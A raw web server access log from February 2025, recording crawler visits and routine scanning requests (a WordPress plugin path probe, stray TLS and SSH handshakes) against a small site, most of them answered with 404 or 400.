195.144.21.56 - - [16/Feb/2025:23:21:58 +0100] "GET /sitemap.xml HTTP/1.1" 404 356 "-" "-"
195.144.21.56 - - [16/Feb/2025:23:21:58 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 369 "-" "-"
195.144.21.56 - - [16/Feb/2025:23:21:59 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
156.59.198.136 - - [16/Feb/2025:23:23:14 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010271503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.51 - - [16/Feb/2025:23:27:28 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
45.138.16.243 - - [16/Feb/2025:23:31:43 +0100] "GET /wp-content/plugins/jalobola/install.php HTTP/1.1" 404 317 "http://food-and-drink.vienna-lodgings.at" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
8.221.136.98 - - [16/Feb/2025:23:32:07 +0100] "GET / HTTP/1.1" 200 423 "-" "curl/7.64.1"
216.244.66.235 - - [16/Feb/2025:23:32:55 +0100] "GET /robots.txt HTTP/1.1" 404 375 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
156.59.198.135 - - [16/Feb/2025:23:43:32 +0100] "GET /renault.activities.at/htdocs/log/cron/exportXML_3115613.txt HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
216.244.66.235 - - [16/Feb/2025:23:44:09 +0100] "GET /?cat=1 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
156.59.198.136 - - [16/Feb/2025:23:47:33 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11850924.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Feb/2025:23:59:33 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10961183.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Feb/2025:00:03:34 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11054496.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [17/Feb/2025:00:08:40 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11133476.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [17/Feb/2025:00:13:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
213.191.117.105 - - [17/Feb/2025:00:38:22 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
3.17.154.150 - - [17/Feb/2025:00:51:36 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.17.154.150 - - [17/Feb/2025:00:51:36 +0100] "SSH-2.0-Go" 400 383 "-" "-"
3.17.154.150 - - [17/Feb/2025:00:51:36 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.17.154.150 - - [17/Feb/2025:00:51:37 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.17.154.150 - - [17/Feb/2025:00:51:48 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.17.154.150 - - [17/Feb/2025:00:53:00 +0100] "" 400 383 "-" "-"